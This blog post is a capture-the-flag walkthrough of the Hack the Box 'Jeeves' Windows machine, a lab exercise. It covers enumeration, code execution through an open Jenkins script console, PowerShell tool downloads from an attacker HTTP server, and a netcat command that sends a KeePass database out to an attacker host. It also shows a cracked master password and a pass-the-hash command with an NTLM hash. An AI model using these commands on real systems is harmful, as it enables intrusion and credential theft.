• Donald Ashdown

Hack the Box Jeeves



Summary

This was a fantastic Windows machine that involved deeper enumeration to identify a service running on a non standard port of 50000. With an unauthenticated connection we execute code from the provided console to obtain a foot hold as user. Running winpeas shows there is a keepass database and the privillege exploit checker shows a juicy potatoe exploit.

Processes/Technique
  • Web app code execution

  • KeePass database cracking

  • WIndows Data Exfiltration - (Sender) nc -nv 10.10.14.102 6363 < CEH.kdbx - (Listener) nc -nlvp 6363 > CEH,kdbx

  • Linux ---> Windows File Transfer - powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe, 'winPeas.exe') - With a linux http.server

  • Pass the hash - sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe

  • Alternative data stream


Tools Used
  • Winpeas.exe

  • John

  • RPC Dump

  • Dirbuster

  • Simple http server

  • keepass2john library

  • pth-winexe

References
Enumeration

As always we start off with a basic nmap scan followed by a version enumeration and the use of the nmap basic scanning scripts. These are denoted by;

-sC - default scripts

-sV - default versions

└─$ nmap 10.129.1.109                          
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT
Nmap scan report for 10.129.1.109
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2


└─$ nmap -sC -sV 10.129.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT
Nmap scan report for 10.129.1.109
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Port 80 - HTTP webserver

Port 135 - RPC Client

Port 445 - File share

Port 5000 - Jetty 9.4.1-SNAPSHOPT


Enumeration Port 80

Port 80 is running on Microsoft IIS httpd 10 which is very new and we are unlikely to find public CVE's. Further more the website provides constant errors and has no real content.



Enumeration Port 135

Using impackets rpddump.py I scrapped the service for information and found nothing particularly useful.


Enumeration Port 445

SmbClient connections required authentication

smbmap -H also required authentication


Enumeration Port 5000

Port 5000 is looking like the most likely attack vector.


The default website provides an error and has no default directory I think, so the next step in the processes is to check for hidden directories with dirbuster.

We see that /askjeeves/ is eventually found.


Exploiting Jenkins

This landing page puts us in an authenticated session right off the bat and totally opens the door for exploitation. I know from experience that apps like Jenkins and code automation servers that are found on Hack the box and the OSCP PWK labs, can often be exploited by executing code on the platform with the native script builder or console and authenticated access.


After poking around it was suggested that this app is using the groovy language. So my next focus is "Groovy reverse shells". This turns up an immediate result on github.


This part is simple enough, we copy&paste the code into the script console, entering our specific network information.


Our listener gets the catch upon running the "Build executor" in the Jenkins application. This provides us with user level privilege and we capture our first flag.


Privilege escalation

The first place to always start with privilege escalation is by uploading winpeas, a windows enumeration script that is focused on finding privileges escalation opportunities.

This is done by spinning up a python3 http server.


We can download the file onto windows with the following command run on the target windows machine.

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe, 'winPeas.exe')

Referenced from here

https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/

Running winpeas provides something obvious right at the end of the results screen as it relates to keepass a common password manager.


Some simple research on KeePass database vulnerabilities yields almost immediate results.

https://tzusec.com/cracking-keepass-database/


Acquiring keepass.kdbx file

From here we browse to the suggested keepass location of C:\users\kohsuke\documents\CEH.kdbx.


The next step is to exfiltrate this information onto my local machine. After an initial search for binaries on windows that would help with this, I decided to upload nc.exe. I used this link here to reference the file transfer commands with nc.exe.

https://hackersinterview.com/oscp/oscp-cheatsheet-linux-file-transfer-techniques/


The command to download nc.exe from the windows machine, served up with a python3 http.server.

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/nc.exe, 'nc.exe')


Netcat commands to upload the CEH.kdbx to a target listening server.


Netcat command to receive the upload.



Crack the database

Using this blog I found online here, https://tzusec.com/cracking-keepass-database/ we can work towards opening this file and pivoting to root.


Extract the hash

Firstly we can actually extract the hash of the master password using the john library, in particular the keepass module.


keepass2john SecretDB.kdbx
└─$ keepass2john CEH.kdbx 
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
└─$ keepass2john CEH.kdbx > hash.txt


└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)
1g 0:00:00:23 DONE (2021-07-25 21:52) 0.04180g/s 2298p/s 2298c/s 2298C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Open the cracked DB

From here I installed keepass2 on my kali linux machine.


I tried all the passwords and stuffed them anywhere everywhere I could. But at the end of the day, the "Backup stuff" password was a possible hash with no user name. So I proceeded to attempted to pass the hash, initially with impacket however this was constantly erroring out, so I learned about a new tool "pth-winexe". This was successful with the "administrator" username appended to the hash and separated with a : OR % character. From here we captured the root flag.


sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe


Catch 22

Wait a sec! That is not root!


The old "alternate data stream trick". I learned about a variation of this back in highschool.




113 views0 comments